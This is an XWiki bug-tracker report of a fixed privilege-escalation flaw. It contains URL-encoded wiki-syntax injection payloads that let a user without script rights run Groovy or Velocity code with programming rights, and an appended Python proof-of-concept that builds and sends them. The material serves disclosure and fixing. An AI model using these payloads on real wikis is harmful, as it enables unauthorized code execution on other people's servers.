Details
- Type: Bug
- Resolution: Fixed
- Priority: Blocker
- Affects Version/s: 1.5 M2
Description
Steps to reproduce:
- Add
{{template name="admin.vm" output="false"/}} {{display reference="XWiki.AdminFieldsDisplaySheet"/}}
to any place where wiki syntax is rendered, such as the "About" section of your user profile, as a user without programming or script rights.
- Request that page with the URL parameter section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D (decoded, the value is {{/html}} {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("hello from groovy!"){{/groovy}}{{/async}}).
Expected results:
An error message, or nothing at all, is displayed.
Actual result:
"hello from groovy!" followed by some raw HTML is displayed.
This shows that a user without script or programming rights can execute a Groovy macro and thus, in principle, gain programming rights. There is one caveat: the injected section value is converted to lowercase before it is executed. This makes much of the API unusable directly from the section parameter, but there are workarounds, such as using
{{velocity}}#evaluate($request.exploit){{/velocity}}
as the main exploit code, which executes the content of a separate request parameter; that parameter is read by Velocity at evaluation time and is not lowercased, so it can carry mixed-case code. A fully working set of parameters is
section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%2Crequest.exploit%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate%28%24request.exploit%29%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D&exploit=Hello+from+Velocity%21+%24hasProgramming
which produces the output Hello from Velocity! true, showing that the Velocity code runs with programming rights and without any further restriction. Without URL encoding, the corresponding parameter values are
{{/html}} {{async async="true" cached="false" context="doc.reference,request.exploit"}}{{velocity}}#evaluate($request.exploit){{/velocity}}{{/async}}
for section and
Hello from Velocity! $hasProgramming
for exploit.
This exploit is possible because XWiki.AdminFieldsDisplaySheet outputs $section (and other variables) without escaping, which allows XWiki syntax injection, and admin.vm can be abused to set $section from the section request parameter.
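The following script is an added example, not part of the original report: it rebuilds both payloads from their unescaped forms, URL-encodes them exactly as the report does, checks the lowercase constraint on the section value, and interprets the rendered response. Only the second step (requesting the prepared page with the parameters) is automated; the template and display macros still have to be placed in the profile by hand, and the profile URL given on the command line is an assumption.

```python
"""PoC helper for the admin.vm / XWiki.AdminFieldsDisplaySheet wiki-syntax
injection. Added example; the payload strings come from the report above,
the URL handling and checks are assumptions of this script."""
import sys
import urllib.parse
import urllib.request
from typing import Optional


def section_payload(context: str, inner_macro: str) -> str:
    """Build the 'section' value: close the {{html}} macro the sheet opened,
    then run inner_macro inside an uncached {{async}} block whose context
    lists the entries that must be available (doc.reference, request.*)."""
    return ('{{/html}} {{async async="true" cached="false" context="'
            + context + '"}}' + inner_macro + '{{/async}}')


def groovy_section() -> str:
    """First PoC from the report: a Groovy println, context doc.reference only."""
    return section_payload(
        "doc.reference",
        '{{groovy}}println("hello from groovy!"){{/groovy}}')


def velocity_section() -> str:
    """Second PoC: Velocity #evaluate over the 'exploit' request parameter.
    request.exploit is added to the async context so the parameter is visible."""
    return section_payload(
        "doc.reference,request.exploit",
        "{{velocity}}#evaluate($request.exploit){{/velocity}}")


def lowercase_safe(payload: str) -> bool:
    """The section value is lower-cased before it is rendered, so a payload
    only survives if lower-casing it is a no-op. The 'exploit' parameter is
    read by Velocity at evaluation time and is not subject to this."""
    return payload.lower() == payload


def build_query(exploit: str) -> str:
    """URL-encode both parameters (urlencode uses quote_plus, which yields
    the same encoding as the query string quoted in the report)."""
    return urllib.parse.urlencode({"section": velocity_section(),
                                   "exploit": exploit})


MARKER = "Hello from Velocity! "


def has_programming_rights(body: str) -> Optional[bool]:
    """Interpret a rendered page: True/False when the marker is followed by
    the rendered value of $hasProgramming, None when the marker is absent
    (patched instance, or the injection never reached a renderer) or when
    the variable was left unrendered."""
    idx = body.find(MARKER)
    if idx < 0:
        return None
    rest = body[idx + len(MARKER):idx + len(MARKER) + 5]
    if rest.startswith("true"):
        return True
    if rest.startswith("false"):
        return False
    return None


def main(profile_url: str) -> None:
    # profile_url (assumed, e.g. https://wiki.example/xwiki/bin/view/XWiki/alice)
    # must already contain the template and display macros from step 1.
    assert lowercase_safe(velocity_section())
    url = profile_url + "?" + build_query("Hello from Velocity! $hasProgramming")
    with urllib.request.urlopen(url) as resp:
        body = resp.read().decode("utf-8", "replace")
    result = has_programming_rights(body)
    print({True: "vulnerable: Velocity ran with programming rights",
           False: "injection rendered, but without programming rights",
           None: "marker not found: likely fixed or macros not in place"}[result])


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: poc.py <profile-page-url>")
    main(sys.argv[1])
```

The lowercase check is the part worth keeping around: any replacement for the inner macro has to pass `lowercase_safe` or it will never reach the renderer intact, which is exactly why the report moves the mixed-case code into the separate exploit parameter.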
Issue Links
- is caused by: XE-14 Merge XWiki.WebHome page content & wiki administration (Closed)